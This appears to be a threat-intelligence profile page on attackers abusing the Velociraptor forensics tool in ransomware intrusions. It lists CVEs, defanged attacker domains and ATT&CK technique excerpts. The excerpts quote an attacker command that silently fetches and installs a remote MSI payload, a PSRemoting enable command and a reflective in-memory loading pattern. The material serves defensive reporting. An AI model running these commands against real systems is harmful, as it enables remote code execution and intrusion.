Velociraptor
Velociraptor is a legitimate open-source digital forensics and incident response (DFIR) tool that threat actors have repeatedly abused as a post-compromise remote access, command-and-control, persistence, and tunneling framework. Reporting in the provided content ties its malicious use to ransomware intrusions involving Warlock, LockBit, and Babuk, and to activity attributed to Storm-2603 (also tracked as GOLD SALEM / Gold Salem / CL-CRI-1040), with additional use noted by operators associated with The Gentlemen RaaS and in SolarWinds Web Help Desk exploitation cases. Observed capabilities when misused include remote command execution, artifact collection, endpoint control, deployment as a Windows service, use as a backdoor, and establishment of covert tunnels including Visual Studio Code tunnel abuse and Cloudflare-based tunnel infrastructure. Multiple incidents describe attackers installing Velociraptor via MSI payloads such as v2.msi, v3.msi, and v4.msi, often fetched with msiexec from Cloudflare Workers, Supabase, or other staging infrastructure.
The content links Velociraptor abuse to several initial access paths and intrusion chains, including exploitation of Microsoft SharePoint ToolShell vulnerabilities (including CVE-2025-49704 and CVE-2025-49706), SolarWinds Web Help Desk vulnerabilities (including CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551), SmarterMail vulnerabilities CVE-2026-23760 and CVE-2026-24423, and WSUS exploitation associated with CVE-2025-59287. In these cases, attackers used Velociraptor after initial compromise to maintain access, move toward domain compromise, stage ransomware, and support stealthy operations. The content specifically notes use against Windows servers and endpoints, VMware ESXi environments in ransomware operations, and victims across sectors including government, commercial enterprises, MSPs, and organizations affected through exposed internet-facing infrastructure.
Several reports emphasize abuse of outdated Velociraptor version 0.73.4 / 0.73.4.0. The content states attackers deployed this version because it was susceptible to CVE-2025-6264, which enabled privilege escalation, arbitrary command execution, and endpoint takeover. In observed campaigns, Velociraptor was configured to communicate with attacker-controlled infrastructure including velo[.]qaubctgg[.]workers[.]dev, auth.qgtxtebl.workers[.]dev, update[.]githubtestbak[.]workers[.]dev, and chat.hcqhajfv.workers[.]dev. Additional related infrastructure and delivery locations mentioned in the content include files[.]qaubctgg[.]workers[.]dev, royal-boat-bf05.qgtxtebl.workers[.]dev, and Supabase-hosted MSI payloads. Associated detections and artifacts mentioned include Troj/Agent-BLMR, Troj/BatDl-PL, Troj/Mdrop-KDK, ServiceEXE identified as the Velociraptor binary, and configuration files containing attacker server_url values.
Across the provided reporting, Velociraptor is consistently described not as malware by design but as a legitimate security tool repurposed by threat actors for stealthy C2, persistence, lateral enablement, and ransomware precursor activity.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
11 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.
Threat actors have started to use the Velociraptor digital forensics and incident response (DFIR) tool in attacks that deploy LockBit and Babuk ransomware.
Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.
Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.
Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.
Velociraptor is a digital forensics and incident response (DFIR) tool that we have seen threat actors abuse recently in attacks in order to set up command-and-control (C2) communications.
"CVE-2026-24423... exploits a weakness in the ConnectToHub API method to achieve unauthenticated remote code execution (RCE)."
"CVE-2026-23760 is an authentication bypass flaw that could allow any user to reset the SmarterMail system administrator password by sending a specially crafted HTTP request."
Huntress reported active exploitation of SolarWinds Web Help Desk vulnerabilities (CVE-2025-26399 and CVE-2025-40551) by unidentified threat actors, deploying remote management tools and Velociraptor for command and control.
Huntress reported active exploitation of SolarWinds Web Help Desk vulnerabilities (CVE-2025-26399 and CVE-2025-40551) by unidentified threat actors, deploying remote management tools and Velociraptor for command and control.
"Shortly after reconnaissance, the attacker deployed Velociraptor, an open-source DFIR platform... its ability to execute commands, collect artifacts, and remotely control endpoints makes it an effective command-and-control (C2) framework when misused."
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
In August, CTU researchers observed GOLD SALEM abusing the legitimate open-source Velociraptor digital forensics and incident response (DFIR) tool to establish a Visual Studio Code network tunnel within the compromised environment. Some of these incidents ended in Warlock ransomware deployment.
...followed by dropping additional payloads like Velociraptor and the locker to encrypt files.
Techniques & procedures
20 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueThe attacker prepared their own Elastic Cloud free trial, using legitimate Elastic infrastructure, using it as a repository for stolen data across intrusions.
Initial Access
1 technique"CVE-2026-23760 enables authentication bypass via the password reset API... allowing anyone to reset a password by supplying just a username."
Execution
5 techniques"the attackers use this tool—designed for incident response—to maintain persistence and 'set the stage' for their ransomware payload."
These tactics are in addition to previous post-exploit tools and techniques used by the group, which included the Velociraptor digital forensics and incident response (DFIR) tool as its primary command-and-control (C2) framework...
PSRemoting, a built-in Windows feature for remote administration, was enabled and used to execute PowerShell commands on remote systems. C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe "Enable-PSRemoting -Force -SkipNetworkProfileCheck" | We observed three related PowerShell executions through Velociraptor, all following the same fileless execution pattern: Downloading remote bytes, Loading them directly into memory via [Reflection.Assembly]::Load() , and Executing them with .EntryPoint.Invoke() .
"the Java process executed cmd.exe to silently install a remote MSI payload: msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi"
"used the SmarterMail process MailService.exe to spawn a command shell"
Persistence
2 techniques"the attackers use this tool—designed for incident response—to maintain persistence and 'set the stage' for their ransomware payload."
Privilege Escalation
2 techniques"the attackers use this tool—designed for incident response—to maintain persistence and 'set the stage' for their ransomware payload."
"used an outdated version of the Velociraptor, 0.73.4, which is vulnerable to a privilege escalation flaw that allows increasing permissions on the host."
Stealth
4 techniquesThe Velociraptor installer was disguised as " v4.msi "... In our previous report, the threat actors renamed rclone.exe to TrendSecurity.exe to appear legitimate. In this incident, the file that was renamed to TrendSecurity.exe functioned as a loader... The threat actors continue to use a renamed version of the legitimate tool rclone.exe (disguised as TrendFileSecurityCheck.exe )
"...installs Velociraptor, a legitimate digital forensics tool... to maintain access and set the stage for ransomware."
Defense Impairment
1 techniqueCredential Access
2 techniquesVelociraptor Used as a covert C2 platform, including memory and LSASS dumping... KslDump Dumps Kerberos / LSASS-related material... buildx641 ... uses ... ntds.dit, and SYSTEM copies...
Discovery
1 techniqueLateral Movement
1 technique"Storm-2603 chains this access with the software's built-in 'Volume Mount' feature to gain full system control."
Command and Control
4 techniquesVelociraptor, for command-and-control (C2). Visual Studio Code and Cloudflare Tunnel, for tunneling C2 communications. Yuze, for intranet penetration and establishing a reverse proxy connection to the attacker's C2 server across HTTP (port 80), HTTPS (port 443), and DNS (port 53).
For remote access and C2, they rely on frameworks like ZeroPulse and Velociraptor, combined with Cloudflare-based tunnels and custom VPN setups to keep stable access into compromised networks.
These methods include exploiting the Nsec driver with a new BYOVD technique as well as using the remote-access tool TightVNC and the reverse-proxy tool Yuze...
CTU researchers observed GOLD SALEM abusing the legitimate open-source Velociraptor digital forensics and incident response (DFIR) tool to establish a Visual Studio Code network tunnel within the compromised environment.
Exfiltration
1 techniqueData exfiltration is then carried out using automated tools and tuned configurations to move large volumes of data efficiently...
IOCs tracked for this family
6 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Other indicator types observed in public reporting.
Recent activity
23 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A covert remote access/C2 platform used by the operators, including for memory and LSASS dumping, as part of ransomware intrusion workflows.
A legitimate DFIR platform repurposed by the threat actors as their primary command-and-control framework for stealthy persistence and remote operations.
Legitimate DFIR/endpoint visibility tool repurposed by threat actors for command-and-control, persistence, and reconnaissance in intrusions.
Legitimate DFIR/post-exploitation tool abused by attackers for persistence and operational staging in support of ransomware deployment.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.